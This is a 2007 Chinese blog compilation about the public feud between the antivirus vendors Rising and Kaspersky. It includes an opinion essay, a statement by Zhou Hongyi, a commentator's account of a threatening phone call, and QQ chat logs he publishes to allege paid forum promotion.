星期六, 六月 02, 2007

世道变了--由瑞星和卡巴斯基之争所想到的

世道变了--由瑞星和卡巴斯基之争所想到的

新闻来源:原创

记得很久很久以前,当我还是一个小孩子的时候,妈妈教育我,不要管别人怎么说,自己做自己的,只要你是对的,坚持下去,把别人的非议当作耳旁风,然后,证明给他们看. 也是因为昨天是儿童节的缘故吧,我突发奇想以这样一段来开头. 以前,我也确实认同这个观点并实践之,然而,最近,看到IT届的这些事儿,我困惑了,现在果真还是这样吗?

记得很久很久以前,当我还是一个小孩子的时候,妈妈教育我,不要管别人怎么说,自己做自己的,只要你是对的,坚持下去,把别人的非议当作耳旁风,然后,证明给他们看.

也是因为昨天是儿童节的缘故吧,我突发奇想以这样一段来开头.

以前,我也确实认同这个观点并实践之,然而,最近,看到IT届的这些事儿,我困惑了,现在果真还是这样吗?

在IT方面,我也不过是只菜鸟,技术上没有专业背景,不懂;应用上,也就是自己瞎搞.只能算是懂得一些电脑常识.只能是给同学、老师修修电脑、做做系统、杀杀毒的份,IT业界根本没有我插嘴的地方.然而,接触了最近的新闻,我还是感到愕然.

还是泛泛而谈吧.拿几组软件做个对比:

Firefox与opera:Firefox(以下简称FF)现在可谓是非IE核心浏览器的第一大户了,很多人都在用.opera(以下简称OP)作为一款浏览器也是很有人缘.可是在全球,FF的市场份额为25-30%,而OP差不多也就是FF的零头.前几天有人谈这个问题,也是很纳闷,但是有人提出了一点,那就是宣传.君不见现在各大论坛、网站铺天盖地的都是FF的广告“想要你的系统更安全吗,用Firefox吧”、“立即下载带有google工具栏的 Firefox以获得对本站的最佳浏览效果”,FF的广告简直到了见缝插针的地步.然而反观OP,没见多少宣传,况且op的社区最近还撞墙了.

两者我都用过,没感觉使用体验上有特别大的差别.抛开他们本身的功能及用户体验不说,或许宣传力度的差别也是两者占有率差距的一个重要原因吧.因为对于很多对这类软件不太有研究的网民来说,他们听说IE不安全,那好,换吧,换什么呢?看着满天都是FF的广告,google一下,确实不错,好,就用它了. opera?什么东西,没听说过,是不是小作坊的产品?是不是有流氓软件?我最怕这个了...(IE与FF的占有率差别是与MS的软件捆绑有关,另谈)

Discuz!与PHPwind及其他:最近也见到了这两者的争论.Discuz!(以下简称Dis)以易用性著称,最近NT版开放了源码,有人就出来说了,看了源码发现Dis就是一堆XX,既不专业又不高效.不如PHPwind以及其他的一些.然后又有一些人说了,很多建论坛的人都是技术菜鸟,他们才不管哪个模式高效、专业呢,哪个操作简便,看着舒服就用哪个.

仔细想想也是,随着软件选择面的增加,用户眼花缭乱了,不知道怎么选了,就倾向于选择易用的、漂亮的了.像我,一年多前选择邮件客户端的时候,试用了 foxmail、dreammail、Thunderbird等几种,用着也都差不多,最后比较喜欢dreammail的界面风格,就选它了.唯一的缺点就是没有专业的垃圾邮件过滤功能,但是我虽然信箱比较多,但是邮件每天也就几封,对强大的反垃圾邮件模块没有需求,何况我还怕正常邮件被识别为垃圾邮件呢.

对软件易用性、习惯性和UI的追捧似乎越来越成为普通网民的选择标准了.这又如windows与linux在中国的处境,linux再强大,再开源,我没接触过,并且我用windows用得好好的,何况在当前漠视软件知识产权氛围下的中国大陆,我会为了换一个“明正言顺”的合法开源软件而放弃唾手可得的 windows并且还要花费一段时间来学习linux的使用?深究一下,你会发现,还有更多的人连linux是什么东西都不知道.他们以为电脑就是 Windows,Windows就是电脑.像我现在的同学里面还有人只开主机不开显示器,然后问我电脑是不是坏了,怎么开不开?

对于这些普通网民,能怪他们吗?显然不能,他们只是把电脑作为一种工具,或为了工作,或为了简单的娱乐.他们才不管你这个软件技术上如何,他们关心的是好用不好用、周围的人评价如何.

终于扯到瑞X和卡巴斯基了.事件之初,我想,卡巴应该保持沉默,瑞X怎么炒都是他的,你好好完善你的卡巴就是了.然而慢慢地,随着瑞X的步步紧逼,收集了卡巴的误杀经历、然后悬赏找卡巴的“枪手”,到现在更有甚者有IT评论员说收到了瑞X的恐吓电话,我感觉整个的事件越来越搞笑了.

还是从源头来分析吧,诺顿出了误杀事件,百万用户电脑崩溃,国产杀毒3剑客悉数登场,纷纷称大量用户向他们求助.对于此,引用徽剑的一段话:

有人说:诺顿“误杀”用户为什么没有想到给赛门铁克打电话投诉,倒想起给瑞星公司打电话求救呢?”还是那句话:“徽剑问一下:你买了戴尔的电脑出了问题,你会打电话给联想,问问如何处理吗?” 补充一句:“用户用瑞星出了问题,会找江民吗”.

而对诺顿的误杀事件,卡巴就没有火上浇油,只是说涉及竞争对手,不便回应.

说来也怪了,杀毒软件误杀、误判不是年年有吗,那个杀软没有过误判?有吗?今年怎么出了个诺顿事件误杀怎么就捅了这么大一娄子呢?抛开那两个文件到底是不是MS故意在中国留下的后门不说,这次事件可能跟诺顿杀的是系统文件有关,但也不至于这么严重吧.(诺顿只道歉不赔偿是3剑客集体讨伐之后的事情了,应该不是3剑客群起而攻之的原因吧)

然后过了几天瑞星卡卡被卡巴杀了,这才是真正的导火索.瑞星先是发表了一篇文章“卡巴斯基查杀瑞星卡卡,大量用户无法升级”,这一篇好像很温和,只是说“瑞星公司表示,目前正在与卡巴斯基公司紧急沟通.”

卡巴斯基后来回应了一篇文章,绝口不提卡卡之事,说卡巴斯基一向致力于保护用户安全.在各大媒体转载后,多数评论说“瑞星的脸砸茅坑里了”.

卡巴的意思很明白,卡卡本来就有问题.我本以为这时候瑞星会低调地修正一下卡卡,然后也就大事化小、小事化无了,没想到瑞星这下来劲了,开始明着跟卡巴交火了,把卡巴在台湾的事儿抖了出来,N年前卡巴的误杀也抖了出来,(我一直怀疑怎么没人也给瑞星弄份名单?肯定不比卡巴少)然后律师声明、悬赏公告,我终于明白了,这分明是是一场猴戏嘛.见过无聊的,没见过这么无聊的.

比较搞笑的一段是:“瑞星公司正告卡巴斯基公司,在本次声明发布12小时内,如果贵公司不向广大用户和瑞星公司认错、道歉的话,瑞星将会让媒体和公众知道更多的真相.”我看完直接笑翻了,这什么跟什么啊,这是软件公司吗?

还有,“瑞星公布悬赏卡巴斯基诽谤证据实施细则”这篇更有点哗众取宠了,我就没法说了,并且最后一句话:“若最终奖金有剩余,瑞星将通过公开的方式,把剩余的奖金全部捐献给慈善机构.”......我对瑞星公司的敬佩之情,如滔滔江水、绵绵不绝.这真是当了XX还要立XX.把这100万用于产品研发,应该比搞所谓的“悬赏”更有意义一些吧?

不过说实在的,卡巴也是不厚道,发表了一篇似是而非的声明,要我看,要是卡卡没有问题,那你就倒个歉,修正一下,瑞星难道还会抓住你不放?要是卡卡真有问题,你就指出问题在哪里就是了,遮遮掩掩地做什么.即便你第一份回应瑞星的声明,怕引出纠纷,不便公布详细情况,现在都火烧眉毛了,卡巴你怎么还沉得住气?

现在在瑞星的主页上,有11篇醒目的红色主题,其中6篇是针对卡巴斯基的,一篇是针对诺顿的,还有一篇是给自己产品做的广告,这样大张旗鼓的商业竞争,真是世界罕见啊,比某专家说的中国网通跟电信的竞争还要惨烈,这也算是一件奇闻了.

金山和江民好像对此事件没有什么回应,并且金山最近在越南发布了英文版的毒霸和wps office,说实话,我以前对金山毒霸印象不好,但是这次我认为金山的做法很明智.

不过我感觉卡巴斯基也该出来正式的说点什么了,因为我上面说过,对于那些普通网民,他们搞不清楚到底卡巴好还是瑞星好.如果看到满世界都是瑞星攻击卡巴的文章,还有一大堆人鼓吹瑞星多好多好,估计他们也会选择瑞星的.就算为了商业利益,卡巴也该有所回应了.

在这场论争中很多人喜欢抗出民族主义的大旗,我就纳闷了,那些人没脑子吗?难道不用瑞星就是卖国了?再说了,国产杀毒也不是只有瑞星一家啊.

比较戏剧性的是,昨天,在国外,PCWorld及PCAdvisor为卡巴斯基颁奖,而在中国,瑞星公布了悬赏卡巴斯基诽谤证据实施细则.不知道PCWorld及PCAdvisor的同志们跟瑞星分别会怎么想.

瑞星跟卡巴我都用过,各有所长,杀毒效果上,卡巴略胜一筹,宣传攻势上,瑞星遥遥领先.

我是枪手吗?瑞星没给我钱,卡巴也没给.我今年大部分时间都在用Nod32,包括现在.

回头看第一段,我感觉那个时代已经远去了...

周鸿祎:我的讲话受到歪曲

作者:周鸿祎 | 出处:DoNews

今日,某媒体刊发了一篇题为《误杀事件扯出潜规则:卡巴斯基对腾讯痛下杀手》的文章,此文章经腾讯公司证实,是由某公司借助公关公司幕后散发的。此文章还对我的讲话进行了歪曲性的引用。对此,我声明如下:

1、该文将卡巴斯基误报“××”软件,全部称为误杀“××”软件,并且在文章中用同样的方法对我的讲话进行歪曲性的引用。对于这种行为,我将保留追究其法律责任的权利。

2、从技术角度上讲,没有一家杀毒公司不存在误报现象,世上没有完美的软件。判断规则比较严的杀毒软件,一旦发现任何存在潜在风险的行为,就将在第一时间对用户进行提示,如果所有的杀毒厂商都因为害怕误报而将报警的底线放低,放过不明确的风险软件,最终受到更大伤害是广大用户。

3、呼吁公平、健康的竞争环境。对此次由于国际软件误报事件演变成了某些公司的恶意竞争行为表示遗憾,长此以往,毁掉的是所有用户对杀毒软件的信任。希望企业能够将精力放在对自身产品的不断研发和创新上,致力于给用户提供最好的安全方案。

知名IT评论员遭遇恐吓电话 IT圈堪比娱乐圈

知名IT评论员遭遇恐吓电话 IT圈堪比娱乐圈

国内知名IT评论员徽剑于5月31日晨接到匿名电话,对方威胁徽剑要将其"弄进去".

国内的IT圈"年年岁岁人不同,岁岁年年骂不断",各大厂商深喑炒作的威力,时不时的跳出来做个小丑惹得国民笑一笑.仅仅因为一篇评论文章就招得恐吓电话,让人不得不感叹IT圈居然和娱乐圈一样乱.甚至,比娱乐圈还乱.

徽剑接到一个帮瑞星说话的匿名电话

附注介绍一下前因后果

1,从今年5月中旬开始,瑞星开始批诺顿,接着连卡巴也批评上了,

2,5月下旬开始,瑞星的公关们在天涯社区IT视界发布公关稿,

并遭到徽剑的反击,发表了那篇《关于瑞星的彻底批判,一只老甲鱼的末路狂奔》文章被转遍全国杀毒、IT等社区。

3,随后徽剑被瑞星的公关说成是卡巴斯基和周鸿祎的枪手,并在全国广泛发帖。

4,徽剑随后发表《原天涯斑竹徽剑谈瑞星的公关们的内幕》techweb在这次瑞星事件中扮演的角色大起底彻底暴光了瑞星的公关老底和内幕

5,最近几天又在不少文章中出现指认徽剑是卡巴斯基的枪手,有意思的是原来的文章主要发布在IT类网站,现在的文章主要发在普通人阅读的板块。

6,今天5月31日徽剑接到不明电话,

今天上午11点多。徽剑刚起床,接到一电话,电话似乎是用那种铁通网络电话打的,没有号码显示,接通电话,这里是徽剑凭记忆马上写下来的,除了个别字外,出入应该不大。

对方:你是徽剑吗

徽剑:是啊,您有何指教

对方:你最近是不是写了一篇骂瑞星的文章

徽剑:我没骂有瑞星,我只是写了一些事实

对方:你是不是拿了谁的钱啊,这样卖命

徽剑:你怎么说话呢?你那里的,是瑞星的还是techweb的

对方:你别管我是那里的

徽剑:那你这么急眼干嘛,难道瑞星不能批啊,瑞星的老底不能揭啊

对方:人家瑞星好歹也是国产品牌,要维护民族产业嘛

徽剑:你用windows吗,用windows的人是没有资格这样说的,你想想瑞星干了些什么事?不好好做软件,尽搞无赖行为

对方:什么无赖行为

徽剑:难道最近瑞星让一批枪手到处批卡巴和诺顿,不是无赖是什么

对方:哈哈

徽剑:还把周鸿祎扯上,周鸿祎能与这事相关?我不相信

对方:哈哈哈,周鸿祎名声已经臭了,再臭点也不碍事啊,就让他为国产软件做点贡献吧

徽剑:你不觉得这样很无耻吗

对方:什么叫无耻啊,这是商业手段

徽剑:你们就用这手段来推广瑞星?

对方:我什么时候说过用这手段推广瑞星啊,你证据呢

徽剑:你很会说话啊

对方:是吗

徽剑:是啊

对方:哈哈,不过你那文章确实写的很不错,文笔很好啊,是学中文的吧

徽剑:不是,我学理科的

对方:这样吧,你别批瑞星,帮我们批卡巴吧,

徽剑:我有好处吗

对方:当然有好处啊

徽剑:但是瑞星是在不如卡巴啊

对方:你不懂商业啊,技术只是一部分,关键是商业运作,就像微软,技术不行,人家不照样是老大吗

徽剑:但是瑞星是杀毒软件,技术实在不行啊

对方:技术也就是那么个东西,你能把产品卖出去就是成功。

徽剑:呵呵,那你承认瑞星技术不如卡巴斯基?

对方:这不是承认不承认的问题,不说这个了,你帮不帮

徽剑:我不能说瞎话啊,我是搞技术出身,必须承认事实啊

对方:你真是死脑筋

徽剑:这是做人的准则,我徽剑写文章也一样,不管是批评还是称赞,都会事实求实,可能在角度上会有一些不足,但是原则上我不会乱写。

对方:你写别人我不管,但是你以后不要再写瑞星了啊

徽剑:不是我要写瑞星,是瑞星来惹我了

对方:怎么惹你了

徽剑:还把我说成是周鸿祎的枪手,还把这些攻击我的内容到处贴

对方:这没办法,你的文章成焦点了

徽剑:你不觉得很搞笑吗?难道不怕我告你们

对方:哈哈,你知道我们什么背景吗

徽剑:我管你什么背景,我想写就写

对方:老实告诉你,你别以为你在深圳就猖狂,要是在北京,现在早把你送进去了。

徽剑:你以为你是谁啊,是公安部啊,还是政法委啊

对方:在北京我们想整谁就整谁,知道田亚葵不

徽剑:是你们干的啊,

对方:是啊

徽剑:不错,敢承诺啊,有种

对方:告诉你啊,以后给我别写了啊,这也是看得起你才这样说

徽剑:那要是看不起会怎么说啊

对方:你别以为你在深圳我们就不能把你怎么样,打个电话过去照样整你

徽剑:你们有种的就来啊,老子这么多年在深圳也不是吃素的

对方:你敢告诉我你在深圳哪里吗

徽剑:你敢公开你的姓名和联系电话吗

对方:你有种,你等着

=======================================

徽剑声明

1,徽剑的任何文章的证据都是有据可查的,是实事求是地经过认真分析写出来的。

2,徽剑不接受任何形式的要挟和贿赂,徽剑现在会写IT评论,将来也一如既往的写IT评论,对于负面的东西,只要是事实,徽剑就敢批。

3,徽剑警告某些国内厂商,对于企业经营来说,为顾客提供最好的产品和服务是第一位的,采用卑劣的手段攻击竞争对手是可耻的,没有好的商品,迟早会被消费者抛弃的,这与利用与政府某些部门的某些腐败人员的勾结来干扰市场,我相信迟早有一天反贪局会上门的。

4,徽剑提醒国内某些媒体,做人要有点骨气,有点贞操观念,不要人家给钱就上,甚至成了为人家主动出谋划策的老鸨就无语

5,徽剑提醒中国的网民,中国IT产业起步晚,基础差,我们需要努力,要打败国外的对手,但是我们要堂堂正正去迎战,像个勇士去决斗,这才是中华民族的精神。采用卑劣的方法去竞争,是让全体中国人蒙羞的。

徽剑2007年5月31日于深圳

原天涯斑竹徽剑谈瑞星的公关们的内幕

原天涯斑竹徽剑:从QQ记录看看瑞星的公关们的嘴脸

最近几天,很有意思,先是诺顿出了问题,然后是瑞星出来说话,紧跟着瑞星挨了批,当然这批评者有我一个,接着瑞星大喊黑手,徽剑也不是IT视界的斑竹了。

这些热闹的里面,隐藏着什么有意思的南北呢?

徽剑将用几篇文章,来逐个讲解,今天先讲天涯的事件。让我们从头看起,

更前就不废话了,这里话说

2007-5-21 13:59:00作者:蓝色的鱼缸 发表了题目为

瑞星,你的名字叫做宋祖德

http://www7.tianya.cn/publicforum/Content/itinfo/1/65361.shtml

备注:作者蓝色的鱼缸是一位在广州一家知名计算机公司上班并且经常在天涯发帖、对IT现象评头论足的热心网友,徽剑跟他网上交流差不多有大半年,至少在这篇文章里面,除了嘲讽瑞星,没有别的,而且凭徽剑眼光的可以认为像这样的文章是不可能通过客户公关审查的。因为他平时比较热心,文章又具有吸引眼球的地方,徽剑于是加红推荐。

2007-5-21 19:36:00 ID为大风歌111发表了题目为

卡巴斯基、诺顿的”误杀“给中国网民的思考

http://www7.tianya.cn/publicforum/Content/itinfo/1/65385.shtml

这个看看就很成问题了,首先凡是经常混论坛都可以看出来“大风歌111”这样的ID绝对不是正常的,只是那种用来发垃圾帖的马甲。

时间:2007-05-21日,这一天,瑞星的公关发了一篇文章

这里就是发表后与徽剑对话的QQ记录

QQ_时报丁香 21:32:38

http://www.tianya.cn/publicforum/Content/itinfo/1/65391.shtml

(备注:这篇文章及后面的作者回帖是个傻子都可以看出这是公关稿)

徽剑 21:33:38

嘿嘿,收了瑞星多少好处啊

QQ_时报丁香 21:34:14

没啊。觉得卡巴斯基实在是太欺负人了

徽剑 21:35:16

那你就错怪了

QQ_时报丁香 21:35:28

没错怪

徽剑 21:35:58

我知道在至少在天涯帮卡巴斯基说话的好像没人拿过好处

QQ_时报丁香 21:36:02

19号早上,我和信息产业部的一个负责人聊天,他说的。

徽剑 21:36:06

?????

QQ_时报丁香 21:36:24

他对诺顿和卡巴斯基对大陆不负责非常恼火

徽剑 21:36:39



QQ_时报丁香 21:36:46

现在都不建立病毒室。出了事。连赔偿都不提

徽剑 21:36:47

那你真的就错怪了

QQ_时报丁香 21:37:03

在国外,诺顿可能要面临巨大的赔偿

徽剑 21:37:03

卡巴斯基目前在中国只有代理

QQ_时报丁香 21:37:09

是啊

QQ_时报丁香 21:37:18

所以要抨击抨击

徽剑 21:37:21

本来他们就没有正儿八经在中国开展业务

QQ_时报丁香 21:37:24

不能只听好话吧

QQ_时报丁香 21:37:49

不抨击,他们总觉得这么做在中国还可以。

徽剑 21:38:35

你错了,卡巴斯基并没有真正开拓中国业务

QQ_时报丁香 21:38:54

和奇虎360绑定。

QQ_时报丁香 21:39:02

这个不算么

徽剑 21:39:02

那是周鸿祎干的

QQ_时报丁香 21:39:09

是啊。

徽剑 21:39:10

很便宜的价格集中买的

徽剑 21:39:25

所以大家不要以为这是卡巴斯基的事

QQ_时报丁香 21:39:34

那应该是谁的

徽剑 21:39:44

其实卡巴斯基是批发卖给了周鸿祎

徽剑 21:39:56

周鸿祎又转手送出来

QQ_时报丁香 21:40:00

抨击周,他是死猪不怕开水烫

徽剑 21:40:12

就算你要找,也只能去找周鸿祎

QQ_时报丁香 21:40:43

最后还是卡吧出的事。

徽剑 21:41:02

因为卡巴斯基与普通人并没有什么关系

QQ_时报丁香 21:41:35

那你说怎么写?我觉得你有些偏袒。

徽剑 21:41:46

不是偏袒

徽剑 21:41:51

是事实

QQ_时报丁香 21:42:00

那个声明,就是一个大笑话

徽剑 21:42:05

卡巴斯基与普通人并没有什么契约关系

QQ_时报丁香 21:42:18

为避免用户、公众受到不准确信息的干扰,切实保障用户网络安全,卡巴斯基公司特就瑞星公司指称卡巴斯基反病毒软件“查杀”瑞星卡卡一事,发表如下声明:

QQ_时报丁香 21:42:32

瑞星卡卡的确被杀了。这是事实。

QQ_时报丁香 21:42:42

卡巴斯基否认,我觉得很可笑

徽剑 21:42:42

瑞星卡卡似乎有问题

QQ_时报丁香 21:42:55

你懂技术么

QQ_时报丁香 21:43:04

QQ还有问题呢。

徽剑 21:43:09

不是那个问题

QQ_时报丁香 21:43:18

不要人云亦云

徽剑 21:43:31

过几天我要写一篇批评瑞星的文章

徽剑 21:43:51

将瑞星发展的来龙去脉和问题来个彻底曝光

徽剑 21:44:05

从瑞星起步开始,到现在

QQ_时报丁香 21:44:12

不会是买好周红衣吧

徽剑 21:44:30

我当面说周鸿祎是流氓啊

QQ_时报丁香 21:44:48

我觉得你的思路有问题。

徽剑 21:45:17

到时候你看过我抖出来的事实再评价

徽剑 21:46:03

可以说,瑞星是中国杀毒软件中做的最肮脏的

QQ_时报丁香 21:46:11

事实是胜于雄辩。我等着。不过希望你别让我失望。我不想看到漫骂。

QQ_时报丁香 21:46:26

因为那个你今天加粗的文章就是漫骂(徽剑备注:指鱼缸的那个帖子)

徽剑 21:47:01

你怎么知道是我加粗的

QQ_时报丁香 21:48:11

给你看看一个帖子

QQ_时报丁香 21:48:19

我不希望你也被牵扯进去

徽剑 21:48:47

加粗是为了引起讨论

徽剑 21:48:55

这是斑竹必须干的

徽剑 21:49:49

斑竹的责任就是换个马甲去扔块砖头,然后到一边看热闹

QQ_时报丁香 21:50:18

http://forum.techweb.com.cn/thread-143405-1-1.html

QQ_时报丁香 21:50:56

别为了件小事,把一世英名毁了

QQ_时报丁香 21:51:08

现在和daqi、qihoo关系密切的版主一个置顶贴在200元以上,天涯,mop的更高。这就是qihoo要做的口碑营销的实质。玷污了用户的桌面,周鸿祎又强奸了曾经自由、民主的论坛。

徽剑 21:52:09

现在和daqi、qihoo关系密切的版主一个置顶贴在200元以上,天涯,mop的更高。TechWeb-业界论坛

这是胡扯,怎么没人给我钱啊

徽剑 21:53:40

要知道,现在天涯IT视界主要是我在操作

徽剑 21:53:54

其他版主都很少做

QQ_时报丁香 21:53:59



QQ_时报丁香 21:54:05

你的网站建立的如何了?

徽剑 21:54:27

www.itpose.com

QQ_时报丁香 21:57:31

赶紧把我的文章加粗了。

QQ_时报丁香 21:57:45

我刚刚知道你在操作。哈哈

QQ_时报丁香 21:57:51

以后就走你的后门了

QQ_时报丁香 21:58:26

给你的报酬就是 你来北京了,我情你喝茶。

徽剑 21:58:33

晕,现在后门这词是黄色的

QQ_时报丁香 21:58:38

是江西的茶

QQ_时报丁香 21:58:40

狗牯脑

QQ_时报丁香 21:58:52

贡品挖

徽剑 21:58:50

江西没好茶

QQ_时报丁香 21:58:57

横横

QQ_时报丁香 21:59:05

还有观音王

徽剑 21:59:23

我不喝茶的,我平时都喝白水

徽剑 22:19:51

http://www4.tianya.cn/new/Public ... m=itinfo&flag=1

QQ_时报丁香 22:22:02

徽剑 22:23:42

把你的也加红了

徽剑 22:32:03

再看一下,你会发现很有意思的地方

QQ_时报丁香 22:32:22



徽剑 22:32:34

杀毒软件三雄争霸专题

徽剑 22:33:55

我差点没写个三狗互咬

QQ_时报丁香 22:35:07



徽剑 22:42:24

这几天我要开始批瑞星、阿里巴巴、谷歌

QQ_时报丁香 22:42:42



徽剑 22:44:40

全部揭老底

QQ_时报丁香 00:01:55

http://forum.techweb.com.cn/thread-143589-1-1.html

投票,随便选

徽剑 00:03:35

投了卡巴

2007-05-23日,这时在这几个帖子里面大量出现支持瑞星的回帖,有一些回帖一看就是从别的地方复制过来的。更为搞笑的是这些ID回帖的时间贯穿了整天,中间间隔很小,如果考虑区别的地方看贴的时间,也就是说他们整天都在关注这个帖子,正常人不会上班干活吗,一整天都为了回复一个帖子?

下面是23日聊天记录

徽剑 16:09:34

有好几个人说了,如果你没有跟瑞星有够大,那是太阳从西边出来了 (备注:是勾搭)

QQ_时报丁香 16:10:08

西边就西边吧

QQ_时报丁香 16:10:21

我觉得你的网络公关也不错。做的。

徽剑 16:10:34

我做了那个?

QQ_时报丁香 16:11:03

网络公关哇。嘻嘻。

QQ_时报丁香 16:11:20

我这几天,在网络里看了好多你的资料捏

徽剑 16:11:26

如果你们这样发帖,这边要干预了

徽剑 16:11:38

完全是为瑞星做广告了

QQ_时报丁香 16:11:48

我又发了什么帖子了?

徽剑 16:12:15

你看看里面的跟帖,没有实质性内容,大多是广告性的

QQ_时报丁香 16:12:23

说国产不好,就能赢得大家的支持。

QQ_时报丁香 16:12:31

那样我不屑

QQ_时报丁香 16:12:54

我用的就是瑞星。

QQ_时报丁香 16:12:59

事实就是事实。

QQ_时报丁香 16:13:28

我把我的使用写了出来,这是我的自由。

徽剑 16:13:28

有一点,你的帖子点击量明显有问题,不是正常人在浏览

QQ_时报丁香 16:13:35

如果你觉得不好,那随便

QQ_时报丁香 16:14:05

那请你找天涯的人查

QQ_时报丁香 16:15:24

我问心无愧。以文字和事实取胜。这也应该是你,一个治力于网络的人应该明白的。

QQ_时报丁香 16:16:06

如果不是事实,一开始,就颠倒是非。那么你即使走网络公关的路,将来只能是越来越窄。

QQ_时报丁香 16:17:28

19日早上,我和信息产业部的负责人一起聊天的时候,他告诉我,肯定会追究诺顿等国外厂家对中国的不负责任的行为。

QQ_时报丁香 16:18:07

希望别利用天涯,误导一些网友吧。这也是我劝告你的。

QQ_时报丁香 16:18:54

毕竟国家会保护多大多数人的利益。

徽剑 16:19:21

你不要来针对我,我这里需要的是给网友一个正常交流的版面,也不排除一些广告软文之类活跃版面,但是如果这种干扰了整个版面的就说不过去了

QQ_时报丁香 16:19:46

第一,我现在还没上天涯呢。

QQ_时报丁香 16:19:59

我的帖子里面出现了什么我自己都不知道。嘻嘻。

QQ_时报丁香 16:20:13

只是把瑞星和卡巴斯基的动态随时复制到里面。

QQ_时报丁香 16:20:20

复制完就走。

(徽剑备注:对比一下前面徽剑说的“这些ID回帖的时间贯穿了整天,中间间隔很小,如果考虑区别的地方看贴的时间,也就是说他们整天都在关注这个帖子,正常人不会上班干活吗,一整天都为了回复一个帖子?”)

徽剑 16:21:20

事实求实地说,瑞星确实很差

QQ_时报丁香 16:21:29

第二,我很尊重你。

徽剑 16:21:32

要么乱杀,要么不杀

QQ_时报丁香 16:21:46

但是我在使用。很多象我一样的人都在使用

QQ_时报丁香 16:21:49

这是事实。

QQ_时报丁香 16:22:03

我在说事实。

徽剑 16:22:38

其实这里面有一个很核心的问题

徽剑 16:22:43

你们都回避了

徽剑 16:23:49

那就是为什么诺顿会把中文版的视窗文件当病毒杀,而且那两个文件还是与网络链接相关的

QQ_时报丁香 16:24:15

这是网络谣言。

徽剑 16:24:33

从技术上来说,我感觉诺顿没有误报,因为他是按特征码来判断的

QQ_时报丁香 16:24:47

我希望不要把这个谣言,当作诺顿公司失职的体现。

徽剑 16:25:02

视窗里面有后门这不是谣言

QQ_时报丁香 16:29:01

这是忽悠网友

QQ_时报丁香 16:29:07

很简单的事。

徽剑 16:30:02

视窗里面有后门

是忽悠网友????

QQ_时报丁香 16:33:32

关键是,要建立在调查的基础上。

徽剑 16:34:32

你调查了吗

徽剑 16:35:03

你没有调查,如果说“别人是忽悠网友”

QQ_时报丁香 16:40:08

现在,关键是已经让中国网民损失了。

QQ_时报丁香 16:40:10

这是事实。

徽剑 16:41:30

就算是事实,也要把事实弄清楚,不能只看表面,

比如说甲犯了罪,乙为了制止,结果造成了损失,

你怎么办

徽剑 16:42:12

按照你的观点,把乙判了就拉到

QQ_时报丁香 16:42:25

直接找凶手。但是帮凶也不能放过。

QQ_时报丁香 16:42:43

既然杀了人,就要一查到底。

徽剑 16:42:44

是啊,但是如果这个是见义勇为呢

QQ_时报丁香 16:42:53

事实胜于雄辩。

徽剑 16:42:51

失手了

QQ_时报丁香 16:43:12

失手,也是猜测。

QQ_时报丁香 16:43:34

事实上,就是网民受到了损失。

QQ_时报丁香 16:43:39

这个必须解决。

QQ_时报丁香 16:43:48

不解决,不呼吁,对不起自己的良心。

QQ_时报丁香 16:45:16

我可以肯定的说,我的帖子发到天涯,会有人看。至于谁看就不得而知了。

所有的网站,包括天涯的后台,都有国家信息产业部和安全局的人监控。

我怀疑给我回复的人中,有众多马甲。不过这个是能查出来的。

QQ_时报丁香 16:45:59

还有就是,我的帖子里面。有卡把的枪手,有诺顿的枪手,有金山的,有江民的。

QQ_时报丁香 16:46:32

瑞星的,也不能不排出。

QQ_时报丁香 16:46:37

还有趋势

QQ_时报丁香 16:46:39

微点。

QQ_时报丁香 16:46:45

你自己看吧,就知道了。

徽剑 16:46:42

因为我是做技术出来的,刚好我原来还参与过杀毒软件开发,所以我对这次事件里面有很大的好奇

我就觉得奇怪,为什么诺顿不杀英文版,为什么杀中文版。只有一种解释,就是诺顿发现了中文版视窗里面有跟病毒类似的代码。

QQ_时报丁香 16:47:06

确切的说,你目前在做网络公关。

徽剑 16:47:18

但是没有一家杀毒软件是我的客户

徽剑 16:47:26

我是中立的

徽剑 16:49:16

卡巴都没有重视中国市场,连在中国的市场推广都没有,不可能在中国有公关

QQ_时报丁香 16:50:07

他和奇虎绑定

QQ_时报丁香 16:50:13

奇虎是做网络公关出身的。

QQ_时报丁香 16:50:20

里面有版主联盟。

徽剑 16:50:18

那是周鸿祎白送的

QQ_时报丁香 16:50:32

你看看一个帖子,就知道了。

QQ_时报丁香 16:50:48

http://bbs.tech.sina.com.cn/?h=/ ... 075&g=8&n=1

徽剑 16:50:52

看过了

QQ_时报丁香 16:51:01

很垃圾的公关行为

徽剑 16:51:06

没感觉

QQ_时报丁香 16:51:12

新浪的博客编辑 们都删除了

QQ_时报丁香 16:51:13

是啊。

徽剑 16:51:29

那也不是推卡巴

徽剑 16:52:12

卡巴是360为了推广自己而白送的,这种情况下他没有必要去做什么

QQ_时报丁香 16:52:40

但是周红衣必须做。

QQ_时报丁香 16:52:48

他的推广手段是很流氓的。

QQ_时报丁香 16:52:54

这是在北京是公开的密码

QQ_时报丁香 16:53:00

你在南方自然不知道

徽剑 16:53:03

虽然我对周比较反感,但是这件事扯上他未免搞笑,因为他是一个唯利是图的人,没有利益的事他不会去做

QQ_时报丁香 16:53:11

奇虎公司的员工都这么曝光

徽剑 16:53:52

过两天我会彻底把瑞星批一顿

QQ_时报丁香 16:54:31

你不理智。可以原谅你。

徽剑 16:54:36

瑞星现在的做法已经可以说是激起了公愤,都看不下去了

QQ_时报丁香 16:55:08

不是公愤,是几个马甲的公愤。

徽剑 16:55:24

我认识的人中,没有马甲

QQ_时报丁香 16:55:44

如果不是和某些人有约定,我可以告诉你,就10几个马甲在我的帖子里面闹。

(徽剑备注:“和某些人有约定”有意思吧)

QQ_时报丁香 16:55:59

但是,你看看里面有多少名字。

QQ_时报丁香 16:57:04

如果你拿了周的钱,我不会说别的了,你自己行事去。如果你想用这个方式吸引周的注意。我也不会说什么。

QQ_时报丁香 16:58:10

但是,别饮鸠止渴就成。毕竟中国的百姓们在这次灾难中受到的损失最大。

徽剑 16:58:28

第一,周没有给我的钱,否则我不会那样批迅雷

第二,我没必要通过这个吸引周的注意,因为他老早就知道我了

QQ_时报丁香 16:58:51

站在百姓的角度做事情。即使QQ是病毒。但是它带来了中国互联网的进步,我也认可QQ。

徽剑 16:59:19

不聊了,改天批了再说

QQ_时报丁香 16:59:27

同理,瑞星也一样。

2007-05-24日,徽剑发表了那篇“臭名远扬”并“引起轰动”帖子,下面是记录

徽剑 10:21:02

徽剑IT评点:关于瑞星的彻底批判,一只老甲鱼的末路狂奔http://www4.tianya.cn/new/public ... le=65523&flag=1

QQ_时报丁香 10:32:09

我不做任何回复。因为里面都是臆测。

